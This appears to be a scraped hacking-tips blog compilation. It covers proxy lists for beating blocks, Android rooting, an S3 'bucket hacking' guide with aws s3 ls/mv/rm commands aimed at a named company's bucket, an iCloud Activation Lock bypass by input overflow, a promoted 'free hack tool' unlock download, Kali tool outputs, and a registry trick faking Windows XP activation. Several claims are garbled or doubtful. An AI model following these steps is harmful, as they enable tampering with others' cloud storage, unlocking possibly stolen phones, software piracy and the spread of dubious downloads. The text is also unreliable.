KNOW HOW TO POST EMPTY OR BLANK POST IN FACEBOOK

This Post Of Learn Hacking I am Going to tell you how to post a blank Facebook status or How to Post an Empty Status on Facebook Wall.
Note:- It works only With both Status and Comments.
So here is the trick..

1) Goto Your Profile and type
2) Type either “@[0:0: ]” or “alt+0173”  ( of numpad without qoutes ofcourse)
3) Press Enter… And That’s it..:P
Simple, isn’t it..    don’t forget subscribe your email for new tips and trick updated​

Top LIST 220 OF FREE PROXY WORLD WIDE UNBLOCK WEBSITE USE..FREE..INTERNET

LIST 195 OF FREE PROXY WORLD WIDE  UNLOCK WEBSITE USE FREE INTERNET FOR FREE🆓📶

                    🔽Below are top proxy sites which are used allover the world by users trying to unblock blocked sites.
🆓

1. Proxy Site – https://www.proxysite.com/
2. Proxy.org – Proxy.org
3. BlewPass – BlewPass.com
4. Web Proxy – Webproxy.net
5. Unlock My Web – http://www.unblockmyweb.com/
6. Proxyq – http://proxyq.com
7. Hide My Ass – https://www.hidemyass.com/
8. 5 Proxy – http://5proxy.xyz/
9. Zfreez – http://zendproxy.com/
10. Free YouTube Proxy – http://www.youtubeunblockproxy.com/
11. Proxy – http://proxy.org/
12. England Proxy – https://www.englandproxy.co.uk/
13. Unblocker – https://www.unblocker.us/
14. O-itc – http://o-itc.be/
15. Fast USA Proxy – http://fastusaproxy.com/
16. Hide mx – http://hide.mx
17. Free Proxy Party – http://freeproxy.party/
18. Best Proxy UK – https://www.best-proxy.co.uk/
19. New IP Now – http://newipnow.com/
20. Vtunnel – http://vtunnel.com/
21. Anonymouse – http://anonymouse.org/anonwww.html
22. Hidden Digital Info – http://hiddendigital.info/
23. K Proxy – http://www.kproxy.com/
24. Don’t Filter – http://dontfilter.us/
25. Working Proxy – https://www.workingproxy.net/
26. Proxy 2014 – http://www.proxy2014.net/
27. Prox Me Call Me Names – http://www.proxmecallmenames.com/
28. Change IP & Country – http://anonymizer.nntime.com/
29. VTunnel – http://vtunnel.com/
30. Rapid Proxy – https://www.rapidproxy.us/
31. Ninja Cloak – http://ninjacloak.com/
32. Proxyo – http://proxyo.info/
33. DeFilter – http://defilter.us/
34. Quick Proxy – http://www.quickproxy.co.uk/
35. Free Proxy Server – https://www.freeproxyserver.uk/
36. Free You Proxy Tube – https://www.freeyouproxytube.com/
37. The Best Proxy – https://www.thebestproxy.info/
38. VPN Browse – http://vpnbrowse.com/
39. Proxy 2014 – http://www.proxy-2014.com/
40. Just Proxy – http://www.justproxy.co.uk/
41. Extreme Proxy – https://www.extremeproxy.us/
42. Fast School Proxy – https://www.fastschoolproxy.com/
43. Remove Filters – https://www.removefilters.net/
44. Monster Proxy – https://www.monsterproxy.co.uk/
45. Hide Me Ass – https://www.hidemeass.co.uk/
46. UK – Proxy – https://www.uk-proxy.org.uk/
47. Proxy One – https://www.proxyone.net/
48. Hide The Internet – https://www.hidetheinternet.com/
49. Just Proxy ca – https://justproxy.ca
50. USA Unblock – http://www.usaunblock.com
51. You Tube Free Proxy – http://youtubefreeproxy.net
52. Stay Hidden – http://stayhidden.co.uk
53. School Proxy – http://schoolproxy.eu
54. Secure Proxy UK – http://secureproxy.co.uk
55. Site Proxy – http://siteproxy.co.uk
56. Site Unblocker – http://siteunblocker.co.uk
57. Quick Proxy – http://quickproxy.us
58. Web Proxy Free – http://www.webproxyfree.net/
59. World Cup Proxy – https://www.worldcupproxy.com/
60. View Youtube – http://www.viewyoutube.net/
61. Proxay – https://www.proxay.co.uk/
62. Greatest Free Proxy – http://www.greatestfreeproxy.com/
63. Mega Proxy – https://www.megaproxy.asia/
64. Crazy Proxy – https://www.crazyproxy.org/
65. IP Switcher – https://www.ipswitcher.us/
66. Hide My Trax Proxy – https://hidemytraxproxy.ca/
67. Stardoll Proxy – https://www.stardollproxy.com/
68. Proxy 4 Freedom – http://proxy4freedom.com/
69. Fish Proxy – http://fishproxy.com/
70. See Proxy – http://seeproxy.me/
71. Surf Proxy – http://surfproxy.co/
72. Sporium – http://sporium.org/
73. Saoudi Proxy – http://saoudiproxy.info/
74. Proxy Browse – http://proxybrowse.info/
75. Proxy Internet – http://proxy-internet.info/
76. Ca Proxies – http://caproxies.info/
77. Proxy 2015 – http://proxy-2015.info/
78. FB Proxies – http://fbproxies.info/
79. PK Proxy – http://pkproxy.info/
80. America Proxy – http://americaproxy.info/
81. Suede Proxy – http://suedeproxy.info/
82. Korea Proxy – http://krproxy.info/
83. Brazil Proxy – http://brazilproxy.info/
84. ECXS – https://www.ecxs.asia/
85. Zalmos Web Proxy – http://www.zalmos.com/
86. Canada Proxy – http://canadaproxy.info/
87. King Surf Proxy – http://www.kingsurfproxy.com/
88. US Proxies – http://usproxies.info/
89. US Proxy – http://usproxy.nu/
90. Zacebook – http://www.zacebookpk.com/
91. Your Proxy – http://proxys.pw/
92. Just Unblock It – https://www.justunblockit.com/
93. Go Proxy – https://www.goproxy.asia/
94. Network Bypass – https://www.networkbypass.com/
95. Me Hide – https://www.mehide.asia/
96. Proxy This – https://www.proxythis.info/
97. PHP Proxy – http://www.phproxysite.com/
98. Xite Now – http://xitenow.com/
99. 4Ever Proxy – http://4everproxy.com/
100. KProxy Site – http://www.kproxysite.com/
101. Surf for Free – http://surf-for-free.com/
102. Intern Cloud – http://interncloud.info/
103. Pro Intern – http://prointern.info/
104. Singapore Proxy – http://singaporeproxy.nu/
105. Work Host – http://workhost.eu/
106. Travel VPN – http://travelvpn.info/
107. Bits Work – http://bitswork.info/
108. Fast Time – http://fasttime.info/
109. Rexoss – http://rexoss.com/
110. Hiding Your Info – http://hidingyour.info
111. Hide IP Proxy – https://hideipproxy.com/
112. Host App – http://hostapp.eu/
113. Proxy Pirate – https://www.proxypirate.co.uk/
114. Pun Proxy – https://www.funproxy.net/
115. 124proxysomemeore –
http://1234proxysomemore.com
116. Proxtrot – http://proxtrot.com
117. Prox Bomb – http://proxbomb.com
118. Hide N Seek – http://www.hidenseek.org/
119. Orange Proxy – https://www.orangeproxy.net/
120. Free Publick Proxy – http://www.freepublicproxy.net/
121. Push Proxy – https://www.pushproxy.com/
122. ProxandTheCity – http://proxandthecity.com
123. Basic Proxy – http://proxandthecity.com
124. no proxy ads – http://noproxyads.com
125. Unblock Web Party – http://unblockweb.party
126. Cool Proxy – https://www.coolproxy.biz/
127. Proxy Tube – https://www.proxytube.info/
128. Free Open Proxy – http://www.freeopenproxy.com/
129. Hope Proxy – http://www.hopeproxy.com/
130. Safe Proxy – https://www.safeproxysite.com
131. Private Surf – https://www.privatesurf.us/
132.🆓 Europe Proxy – https://www.europeproxy.eu/
133. Stealth Proxy – https://www.stealthproxy.co.uk/
134. SSL Proxy – https://www.sslproxy.org.uk/
135. Proxy Power – https://www.proxypower.co.uk/
136. Web Surf – https://www.websurf.in/
137. You Server – http://youserver.nu/
138. HideAccess Info – http://hideaccess.info/
139. proxy-free-web.net – http://www.proxy-free-web.net/
140. Fast Proxy Services – http://www.fastproxyservices.com/

141. 123 Proxy Science –
http://123proxysites.science/
142  . Free Proxy Server GQ – http://www.freeproxyserver.gq/

143. thisproxcandoanything.info

144. proxyserver.ovh

145. extraprivacy.com

146. private-surf.com

147. accessproxy.science
148. solidproxy.net

149. goproxy.gq
150. topproxy.gq
151. new-web-proxy.info
152. forproxy.info
153. vpnbrowse.me
154. 55proxy.nu
155. 123freeproxyserver.club
156. digiproxy.gq
157. 123proxy.science
158. proxy-web-surfing.gq
159. kingproxy.info
160. thugproxy.info
161. yourproxy.science
162. proxy1.science
163. tokaproxy.info
164. superproxy.info
165. hotproxy.gq
166. fastproxyforfree.gq
167. 1proxy.rocks
168. popeyeprox.info
169.freeeasyproxysite.gq
170.    yesproxy.info
171.      usproxy.website

172. proxyvpn.gq

173. freespeedproxy.com

174. wackyweberprox.info

175. abcproxy.gq

176. everybodyusethis.info

177. eeproxy.pw

178. wackywillywonka.info

179. youdontmessaroundwithme.info

180. usaproxy.us

181. freproxywebserver2015.gq

182. oldjonjosephprox.info

183. 00proxy.net

184. 5proxy.xyz

185. rapid-proxy.net

186. serverproxy.gq

187. proproxy.me

188. freeproxyserver.ovh

189. 0zproxy.gq

190. abproxy.gq

191. privateproxy.gq

192. clickmysweetproxy.info

193. alwaysonproxy.gq

194. proxystreaming.com

195. alittle.rocks

196. sassygayguy.info

197. topproxy.net

198. yyproxy.pw

199. fastfoundations.com

200. https://www.megaproxy.asia/

201. Proxify – https://proxify.com/ ( It works for a 3 days

+++++++Share our work

©  vivastate 2017

BEST WAY TO ROOT ANY ANDROID PHONE WITHOUT USE COMPUTER…free full tutorial

How To Root Android Without Computer Using Kingoroot
You can directly download this apk file to your Android device by clicking the link below and then install it

image

🆓
Download Kingoroot apk
Install https://KingoRoot.com on your device.   Top 5 Ways To Root Any Android Phone
🔄
Unlimited Guide To Root Every Phone

I’ve seen many people searching or asking for like how to root android , how will my android phone rooted, how to root my android phone in one click etc, because not every smart phone rooted in same manner. If you beginner, you must read about what is android rooting? before going to root your phone.

“ Rooting your android phone is a technique of allowing users of android devices to get the super control (known as root access) over many Android subsystems. “

Simply “root is the process of allowing your phone to attain a super user privilege that normally isn’t on your device.”

In some models of devices like Sony Xperia, Samsung and Asus we need to unlock the boot loader that is similar to the rooting process. You might be knowing what a boot loader is! If not:

🔘A bootloader is a computer program that loads an operating system (OS) or runtime environment for the computer after completion of the self-tests. A locked bootloader is one that will only boot an OS that it “approves” of.
              So we need to unlock the boot loader.
Most all the android phones can be rooted using the Kingo android Root application that has mentioned below.
If it cannot you may depend on other applications or methods to get your phone rooted.
Before starting the root process you have to know the
advantages of rooting an android device.
Before Rooting you phone

🔘Advantages Of Rooting Android Phone

Advantages of rooting include the possibility for complete control over the look and feel of the device.

·🔘 Support for themes, allowing everything to be visually changed from the color of the battery icon, to the boot animation that appears while the device is booting, and more.

·⏩ Full control of the kernel, which, for example, allows overclocking and under clocking the CPU and GPU.

⏩· Full application control, including the ability to backup, restore, or batch edit applications, or to remove bloatware that comes pre-installed on many phones.

· ⏩Custom automated system-level processes through the use of third-party applications.

·⏩ Ability to install a custom firmware (also known as a custom ROM) that allows additional levels of control on a rooted device. 🚹

1. Backup Your Entire Phone Before Rooting Android Device
It is highly recommended that you should backup the entire data in your phone before trying to root your android phone. This includes your contacts,SMS, apps and data.

If anything goes wrong and your phone get formatted, so that i insist you to backup your android data before proceeding further.

2 Root Your Phone Using Rooting Apps For Android
There are many android applications available in the internet which will help you to root your android phone easily.
I will show you a list of apps that can make your device rooted.
You can choose any one app below to root your android phone easily but you should at least read the description nder each app before proceeding.

During Rooting you phone
1 Kingoroot

Many tools are available to help you root Android device, but few of them are actually easy and fast, at least not easy and fast enough as Kingo one-click root.

Kingo Android Root has launched its APK Root for Android, which provides a universal one-click Android root solution for Android users.
Before jumping into the rooting process, please make sure you get everything right beforehand.

·  Device powered on.

·  At least 50% battery level.

·   Internet connection necessary (Wi-Fi network suggested).

·   Allow installation of apps from unknown sources.

How To Root Android Without Computer Using Kingoroot
You can directly download this apk file to your Android device by clicking the link below and then install it
🆓
Download Kingoroot apk

https://www.kingoapp.com

Install KingoRoot.apk on your device.

If you didn’t check “Unknown Sources” in Settings > Security, then during
   installation, you will get a prompt “Install blocked”, stating that  “For security, your phone is set to block installation of apps obtained from unknown sources”. Just follow phone instructions and install Kingo Root on your device.

Launch “Kingo ROOT” app and start rooting. Click “One Click Root” to start the rooting process.

:D:mrgreen::mrgreen::D:D☺:):)    
©  dont foget to subscribe your email for new update..

HOW TO HACK AMAZONE S3 BACKETS …… FREE

How to hack Amazon s3 Buckets    ☠☠

Amazon s3 Buckets are file repositories to store our files. We can store ‘n’ number of files with a size limit of 5TB. Each and every uploaded files will have a unique link and can be delivered through
Amazon Cloudfront CDN. Many websites now a days use Amazon s3 Buckets to store datas like Images, Logs, Videos etc.


How to Hack Such Buckets ?
In the case of Amazon s3 buckets, Hacks occur due to the ACL misconfiguration of the Bucket. ACL means the Access Control Limits. If the developer is not giving proper care/importance while configuring s3 Buckets it is prone to such attacks.
Lets see how we can Hack into such a bucket.

Lets Take An example🤡.
http://shopify.com.s3.amazonaws.com
This is a bucket used by shopify. What ever comes before .s3 is the name of the bucket, and in this case the name of the bucket is shopify.com .
To connect with such mis-configured buckets we need a s3 Client.

You can download the same from Amazon s3 Website.

You can install the AWS Command Line Interface by using this command.

apt-get install awscli
Now we need to configure the Client by entering Access Keys.👉🏾 You can generate the access key by creating an account and following the steps shown in the link.➡
https://aws.amazon.com/developers/access-keys/
Once we have the Access Keys we need to configure the client.
For which we can use the command
aws configure
Now enter the keys and get ready to hack.
So lets check 👉🏾http://
example.com.s3.amazonaws.com
is vuln or not.
To check if the Bucket that u want is vulnerable or not open the terminal and enter the following commands.
sudo aws s3 ls s3://bucket_name
As i said before the bucket name is whatever which comes before .s3, here it is example.com
Now after running the above given command, if you can see a list of files as shown in the screenshot, the bucket is vulnerable to s3 Bucket Take Over.

Even if the ls command fails, try to use other commands like mv , rm etc..
Here i will add a file to the bucket using mv command.
Even though it gave me an error, it is clear that aws_takeover.txt file is added into the bucket.

If we have such a permission to rm files, we can delete all the files present in the bucket causing large damage to the website.
Impact

ACL misconfiguration error can be used to view, add, remove files from a bucket.
For the Developers
Make sure that the ACL is configured properly.   

👍🏾    Dont Forget to SUBSCRIBE YOUR EMAIL…for NEW  update…………

How to remove i cloud all i phone and i paid … Full tutorial about how to remove FIND MY PHONE FULL FOR FREE

Full tutorial    how to remove i cloud and delete find my iphone
       📵
👉🏾iPhone includes Activation Lock—a feature that’s designed to prevent anyone else from using your iPhone, iPad, iPod touch, or Apple Watch if it’s ever lost or stolen. Activation Lock is enabled automatically when you turn on Find My iPhone. When you enable Find My iPhone on your iPhone, iPad, or iPod touch, your Apple ID is securely stored on Apple’s activation servers and linked to your device. From that point on, your password is required before anyone can turn off Find My iPhone on your device, erase your device, or reactivate and use your device.
” If you forget your password and can’t reset it, you’ll lose access to your Apple ID and might be unable to use or reactivate your device. If you purchase an iOS device with an Activation Lock Contact the previous owner as soon as possible and ask them to erase the device and remove it from their account ”
Source : https://support.apple.com/en-us/HT201365
In simple words iPhone Ativation Lock is a security measure which prevents an attacker accessing your stolen iPad/iPhone thus getting access to your personal data. If you enable this feature, the thief/attacker while turning ON your iPad/iPhone will be prompted to connect to an Apple Server using a WiFi to check whether the iPhone Activation Lock is ON or Not. As it is enabled in our case the attacker will be again prompted to Enter the Username and Password of the iCloud Account linked to that iPad (ie Our iCloud Details). Without which he cant unlock the device and thereby protecting all our data by making that iPad Useless.
Is there any Working Bypasses ❓
A Big NO
Go through : https://www.quora.com/Can-the-iCloud-lock-be-broken
Some DNS Bypass is there but it only allow you to connect it to some other servers and allows you to browse the web. You wont get any access to iPad/iPhone data or to the Home Screen.⭕

The Impact
If an attacker can Unlock a iCloud Locked iOS device he will get access to all your personal data, Documents, Saved Passwords etc etc. and also he can sell your iPad as it will work fine.🔅
The Story
B ought one used iPad Air iOS v10.1 from Ebay last month for my friend, And that iPad was having such an Activation lock . We got FOOLED, Thank You ebay . As i was new to iOS i browsed a lot for one working bypass. GOT NOTHING ! SO THAT’S A BRICK IN OUR HAND ❗

The Exploit
When i turned on my iPad Air it welcomed me with a setup option to select the language and all . After that the iPad prompted me to connect to a WiFi Network so that it can check the activation status. I connected it to a wifi and after the check iPad showed me a Username and Password field and that means it is locked and i need to enter the iCloud details of the previous Owner.
So how can i bypass it ❓
iCloud lock is a software layer so that if i can crash it, it will take me to the Home Screen.
So how can i Crash it ?
Overflow ❓❓ But where ❓

T he A ttack
( Images are the Screenshots from the video that i made while reporting the issue )
Under the Choose a Wifi Network there was one option Choose Another Network .〰📶

If we select that option the ipad will take us to a window with a Name Field and Select the security Option.
Thats just one input field, I cant create an over flow if it is having a character limit . 👉🏾But if we press on the security option, with other security protocols like WEP, WPA etc we have WPA2 Enterprise edition.
Select WPA2 Enterprise edition and it will give two more input fields Username & Password. ie Now we have 3 Input fields Name, Username, Password.〰
On testing i came to know that there is no Character limit in that
🔻
3 fields . ie We can enter as many characters as we like to that field. Perfect for creating an OverFlow
.🔻
Keep on Typing/Pasting any characters in a bulk to all those three fields until the iPad freezes .
🔻
Waited a bit to see if the iPad is recovering from it or Not
. Nothing happened to the iPad, Not Recovering Nor Crashing .
After waiting a little more i pressed the lock button and it took me back to the welcome screen Again 😦
WTF ?
Is there any ways left create an overflow and crash that app layer to home screen ?
YES🔻

The iPad Smart Case
What an iPad smart case will do is. If we lock the screen using this magnetic

🔻 smartcase and unlock it by opening the case it will show the same old screen thereby sending the req again.
Here i followed the steps again until my iPad freeze and locked it using the Smart Case and then unlocked the iPad by opening the case and waited a bit .   Wait 20-25  minuts After 20-25 seconds the Add Wifi
🔻 Connection Screen Crashed to the iPad Home screen . Thereby bypassing the so called Find My iPhone Activation Lock .
🔻
The issue which i exploited: There was no Character limit in those input fields. No one will set a wifi name with 10000 letter name or a password with 10000 letter so a character limit is important for fixing this bug.
In addition to it Their exits a bug called The Black Screen Mode which allows accessing data without unlocking the device using a previously synced device .
Apple updated all Vulnerabilities in iOS 10.2.1
👉🏾Check it’s documentation for more details …..    

👍🏾Dont forget to SUBSCRIBE YOUR EMAIL…   FOR NEW UPDATE

HOW TO UNLOCK I CLOUD ACTIVATION LOCK FREE

How to Unlock iCloud Activation Lock
           FRIST  
👉🏾First is need to Download the hack tool on your pc. Go on Download Button below and get this software. We give this for free, not is need to pay.
👉🏾Unlock iCloud Lock Download BypassTool
Download
📌Step 1.
Download and Unzip the file on your PC.
📌Step 2.
Start this hack tool on your PC. Connect your iPhone via USB cable.
📌Step3.
Then click on Start button to process bypass icloud lock service.
📌Step 4.
Wait five min to be complete this process. When will be done click OK.🔻
The finaly process is when this will be complete to install the latest versizon on iTunes on your PC. Then make Restore Update on your🔻 device and icloud lock will be permanent removed from your apple device. This is official factory unlock on iCloud lock directly from Apple Database Servers.
🔻
Many services in the world talk for this on net, but be careful, many of them is scam. We this service give you for free, and not like to give money to us. Only Download this hack tool and enjoy.
📌Dear Readers if like to Unlock for Not free in five min your iCloud Lock on your iPhone go here on this 👉🏾 Factory Unlock iPhone company. This is safely service we test. – iPhoneOfficialUnlock
Source
Read Article..- New Bug Allowing Hackers To Bypass Apple’s iCloud Activation Lock..〰   

👍🏾    dont for get to SBSCRIBE your EMAIL for NEW UPDATE

FULL FREE TUTORIAL KALI LINUX A-Z KALI LINUX COMMADS

FULL KALI LINUX   TUTORIAL FOR FREE                      ….                                           .                Kali Linux is preinstalled with over 600 penetration-testing programs, including nmap (a port scanner), Wireshark (a packet analyzer), John the Ripper (a password cracker), Aircrack-ng (a software suite for penetration-testing wireless LANs), Burp suite and OWASP ZAP (both web application security scanners). Kali Linux can run natively when installed on a computer’s hard disk, can be booted from a live CD or live USB, or it can run within a virtual machine. It is a supported platform of the Metasploit Project’s Metasploit Framework, a tool for developing and executing security exploits.
A-Z KALI LINUX COMMANDS
🔘a
apropos : 👉🏾Search Help manual pages (man -k)
apt-get : Search for and install software packages (Debian)
aptitude : Search for and install software packages (Debian)
aspell : Spell Checker
awk : Find and Replace text, database sort/validate/index
🔘b
basename :👉🏾 Strip directory and suffix from filenames
bash : GNU Bourne-Again SHell
bc : Arbitrary precision calculator language
bg : Send to background
break : Exit from a loop
builtin : Run a shell builtin
bzip2 : Compress or decompress named file(s)
🔘c
cal : 👉🏾Display a calendar
case : Conditionally perform a command
cat : Concatenate and print (display) the content of files
cd : Change Directory
cfdisk : Partition table manipulator for Linux
chgrp : Change group ownership
chmod : Change access permissions
chown : Change file owner and group
chroot : Run a command with a different root directory
chkconfig : System services (runlevel)
cksum : Print CRC checksum and byte counts
clear : Clear terminal screen
cmp : Compare two files
comm : Compare two sorted files line by line
command : Run a command – ignoring shell functions
continue : Resume the next iteration of a loop
cp : Copy one or more files to another location
cron : Daemon to execute scheduled commands
crontab : Schedule a command to run at a later time
csplit : Split a file into context-determined pieces
cut : Divide a file into several parts
🔘d
date : 👉🏾Display or change the date & time
dc : Desk Calculator
dd : Convert and copy a file, write disk headers, boot records
ddrescue : Data recovery tool
declare : Declare variables and give them attributes
df : Display free disk space
diff : Display the differences between two files
diff3 : Show differences among three files
dig : DNS lookup
dir : Briefly list directory contents
dircolors : Colour setup for `ls’
dirname : Convert a full pathname to just a path
dirs : Display list of remembered directories
dmesg : Print kernel & driver messages
du : Estimate file space usage
🔘e
echo : 👉🏾Display message on screen
egrep : Search file(s) for lines that match an extended expression
eject : Eject removable media
enable : Enable and disable builtin shell commands
env : Environment variables
ethtool : Ethernet card settings
eval : Evaluate several commands/arguments
exec : Execute a command
exit : Exit the shell
expect : Automate arbitrary applications accessed over a terminal
expand : Convert tabs to spaces
export : Set an environment variable
expr : Evaluate expressions
🔘f
false : 👉🏾Do nothing, unsuccessfully
fdformat : Low-level format a floppy disk
fdisk : Partition table manipulator for Linux
fg : Send job to foreground
fgrep : Search file(s) for lines that match a fixed string
file : Determine file type
find : Search for files that meet a desired criteria
fmt : Reformat paragraph text
fold : Wrap text to fit a specified width.
for : Expand words, and execute commands
format : Format disks or tapes
free : Display memory usage
fsck : File system consistency check and repair
ftp : File Transfer Protocol
function : Define Function Macros
fuser : Identify/kill the process that is accessing a file
🔘g
gawk :👉🏾 Find and Replace text within file(s)
getopts : Parse positional parameters
grep : Search file(s) for lines that match a given pattern
groupadd : Add a user security group
groupdel : Delete a group
groupmod : Modify a group
groups : Print group names a user is in
gzip : Compress or decompress named file(s)
🔘h
hash :👉🏾 Remember the full pathname of a name argument
head : Output the first part of file(s)
help : Display help for a built-in command
history : Command History
hostname : Print or set system name
🔘i
iconv : 👉🏾Convert the character set of a file
id : Print user and group id’s
if : Conditionally perform a command
ifconfig : Configure a network interface
ifdown : Stop a network interface
ifup Start a network interface up
import : Capture an X server screen and save the image to file
install : Copy files and set attributes
🔘j
jobs : 👉🏾List active jobs
join : Join lines on a common field
🔘k
kill :👉🏾 Stop a process from running
killall : Kill processes by name
🔘l
less : 👉🏾Display output one screen at a time
let : Perform arithmetic on shell variables
ln : Create a symbolic link to a file
local : Create variables
locate : Find files
logname : Print current login name
logout : Exit a login shell
look : Display lines beginning with a given string
lpc : Line printer control program
lpr : Off line print
lprint : Print a file
lprintd : Abort a print job
lprintq : List the print queue
lprm : Remove jobs from the print queue
ls : List information about file(s)
lsof : List open files
🔘m
make :👉🏾 Recompile a group of programs
man : Help manual
mkdir : Create new folder(s)
mkfifo : Make FIFOs (named pipes)
mkisofs : Create an hybrid ISO9660/JOLIET/HFS filesystem
mknod : Make block or character special files
more : Display output one screen at a time
mount : Mount a file system
mtools : Manipulate MS-DOS files
mtr : Network diagnostics (traceroute/ping)
mv : Move or rename files or directories
mmv : Mass Move and rename (files)
🔘n
netstat : 👉🏾Networking information
nice : Set the priority of a command or job
nl : Number lines and write files
nohup : Run a command immune to hangups
notify-send : Send desktop notifications
nslookup : Query Internet name servers interactively
🔘o
open : 👉🏾Open a file in its default application
op : Operator access
🔘p
passwd : 👉🏾Modify a user password
paste : Merge lines of files
pathchk : Check file name portability
ping : Test a network connection
pkill : Stop processes from running
popd : Restore the previous value of the current directory
pr : Prepare files for printing
printcap : Printer capability database
printenv : Print environment variables
printf : Format and print data
ps :👉🏾 Process status
pushd : Save and then change the current directory
pwd : Print Working Directory
🔘q
quota : 👉🏾Display disk usage and limits
quotacheck : Scan a file system for disk usage
quotactl : Set disk quotas
🔘r
ram :👉🏾 ram disk device
rcp : Copy files between two machines
read : Read a line from standard input
readarray : Read from stdin into an array variable
readonly : Mark variables/functions as readonly
reboot : Reboot the system
rename : Rename files
renice : Alter priority of running processes
remsync : Synchronize remote files via email
return : Exit a shell function
rev : Reverse lines of a file
rm : Remove files
rmdir : Remove folder(  s)
rsync : Remote file copy (Synchronize file trees)
S
screen : Multiplex terminal, run remote shells via ssh
scp : Secure copy (remote file copy)
sdiff : Merge two files interactively
sed : Stream Editor
select : Accept keyboard input
seq : Print numeric sequences
set : Manipulate shell variables and functions
sftp : Secure File Transfer Program
shift : Shift positional parameters
shopt : Shell Options
shutdown : Shutdown or restart linux
sleep : Delay for a specified time
slocate : Find files
sort : Sort text files
source : Run commands from a file `.’
split : Split a file into fixed-size pieces
ssh : Secure Shell client (remote login program)
strace : Trace system calls and signals
su : Substitute user identity
sudo : Execute a command as another user
sum : Print a checksum for a file
suspend : Suspend execution of this shell
symlink : Make a new name for a file
sync : Synchronize data on disk with memory                                 🔘t
tail : 👉🏾Output the last part of file
tar : Tape ARchiver
tee : Redirect output to multiple files
test : Evaluate a conditional expression
time : Measure Program running time
times : User and system times
touch : Change file timestamps
top :👉🏾 List processes running on the system
traceroute : Trace Route to Host
trap : Run a command when a signal is set(bourne)
tr : Translate, squeeze, and/or delete characters
true : Do nothing, successfully
tsort : Topological sort
tty : Print filename of terminal on stdin
type : Describe a command
Uuulimit : Limi

t user resources
umask :👉🏾 Users file creation mask
umount : Unmount a device
unalias : Remove an alias
uname : 👉🏾Print system information
unexpand : Convert spaces to tabs
uniq : 📂Uniquify files
units : Convert units from one scale to another
unset : Remove variable or function names
unshar : Unpack shell archive scripts
until : Execute commands (until error)
uptime : Show uptime
useradd : 👉🏾Create new user account
userdel : Delete a user account
usermod : 〰Modify user account
users : 👉🏾List users currently logged in
uuencode : Encode a binary file
uudecode : Decode a file created by uuencode
🔘v
v : 👉🏾Verbosely list directory contents (`ls -l -b’)
vdir : Verbosely list directory contents (`ls -l -b’)
vi : Text Editor
vmstat : Report virtual memory statistics
🔘w
wait : 👉🏾Wait for a process to complete
watch: Execute/display a program periodically
wc : Print byte, word, and line counts
whereis : Search the user’s $path, man pages and source files for a program
which : Search the user’s $path for a program file
while : Execute commands
who : Print all usernames currently logged in
whoami : Print the current user id and name (`id -un’)
wget : Retrieve web pages or files via HTTP, HTTPS or FTP
write : Send a message to another user
x
xargs : Execute utility, passing constructed argument list(s)
xdg-open : Open a file or URL in the user’s preferred application.
yes : Print a string until interrupted
🔘Amap
The first next-generation scanning tool for pentesters. It attempts to identify applications even if they are running on a different port than normal.◽
It also identifies non-ascii based applications. This is achieved by sending trigger packets, and looking up the responses in a list of response strings.
root@kali:~# amap -bqv 192.168.1.15 80
Using trigger file /etc/amap/appdefs.trig … loaded 30 triggers
Using response file /etc/amap/appdefs.resp … loaded 346 responses
Using trigger file /etc/amap/appdefs.rpc … loaded 450 triggers
amap v5.4 (www.thc.org/thc-amap) started at 2014-05-13 19:07:16 – APPLICATION MAPPING mode
Total amount of tasks to perform in plain connect mode: 23
Protocol on 192.168.1.15:80/tcp (by trigger ssl) matches http – banner: \n\n501 Method Not Implemented\n\n

Method Not Implemented

\n to /index.html not supported.
\n
\n


\n

Apache/2.2.22 (Debian) Server at 12
Protocol on 192.168.1.15:80/tcp (by trigger ssl) matches http-apache-2 – banner: \n\n501 Method Not Implemented\n\n

Method Not Implemented

\n to /index.html not supported.
\n
\n


\n

Apache/2.2.22 (Debian) Server at 12
Waiting for timeout on 19 connections …
amap v5.4 finished at 2014-05-13 19:07:22
Maltego
Maltego is a unique platform developed to deliver a clear threat picture to the environment that an organization owns and operates. Maltego’s unique advantage is to demonstrate the complexity and severity of single points of failure as well as trust relationships that exist currently within the scope of your infrastructure.
root@kali:~# cat /opt/Teeth/README.txt
NB NB: This runs on Kali Linux
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
#Make directory /opt/Teeth/
#Copy tgz to /opt/Teeth/
#Untar
Load the config file called /opt/Teeth/etc/Maltego_config.mtz file into Maltego.
This is painless:
1)🔻 Open Maltego Tungsten (or Radium)
2) 🔻Click top left globe/sphere (Application button)
3) 🔻Import -> Import configuration, choose /opt/Teeth/etc/Maltego_config.mtz
Notes
———
Config file is in /opt/Teeth/etc/TeethConfig.txt
Everything can be set in the config file.
Log file is /var/log/Teeth.log, tail -f it while you running transforms for
real time logs of what’s happening.
You can set DEBUG/INFO. DEBUG is useful for seeing progress – set in
/opt/Teeth/units/TeethLib.py line 26
Look in cache/ directory. Here you find caches of:
👉🏾1) Nmap results
👉🏾2) Mirrors
👉🏾3) SQLMAP results
You need to remove cache files by hand if you no longer want them.
You can run housekeep/clear_cache.sh but it removes EVERYTHING.
The WP brute transform uses Metasploit.Start Metasploit server so:
msfconsole -r /opt/Teeth/static/Teeth-MSF.rc〰
It takes a while to start, so be patient.
In /housekeep is killswitch.sh – it’s the same as killall python.
Crackle
Crackle exploits a flaw in the BLE pairing process that allows an attacker to guess or very quickly brute force the TK (Temporary Key). With the TK and other data collected from the pairing process, the STK (Short Term Key) and later the LTK (Long Term Key) can be collected.
With the STK and LTK, all communications between the master and the slave can be decrypted.
root@kali:~# crackle -i ltk_exchange.pcap -o ltk-decrypted.pcap
!!!
TK found: 000000
ding ding ding, using a TK of 0! Just Cracks(tm)
!!!
🚫Warning: packet is too short to be encrypted (1), skipping
LTK found: 7f62c053f104a5bbe68b1d896a2ed49c
Done, processed 712 total packets, decrypted                              .     ®DONT FOGET TO SUBSCRIBE your EMAIL  for NEW update  for free                                                                                                         

                👏🏾

  🌐 and     share any where

FULL SMPLE TRICK FOR WINDOW XP GUNUINE

FULL  SMPLE TRICK FOR WINDOW XP GUNUINE                  .                                     .
Follow   this  simple step   👉🏾Start>>
run>>
regedit>>
HKEY_LOCAL_MACHINE>>
SOFTWARE>>
Microsoft>>
Windows NT >>
Current Version >>
WPAEvents >>
Double click OOBETimer >>
Select all and delete >>
FF D5 71 D6 8B 6A 8D 6F D5 33 93 FD >>
Right click on WPAEvents >>
Permissions >>
System >>
Deny Full Control >>
Apply >>
Yes >>
OK >>
Done!
👉🏾If Necessary then Reboot Your Computer..              …     .                                       .                   .                    🔘dont foget to   SUBSCRIBE   your email  for free 👍🏾 [color=FF0000]NEW[/color] hackng tutorial   update

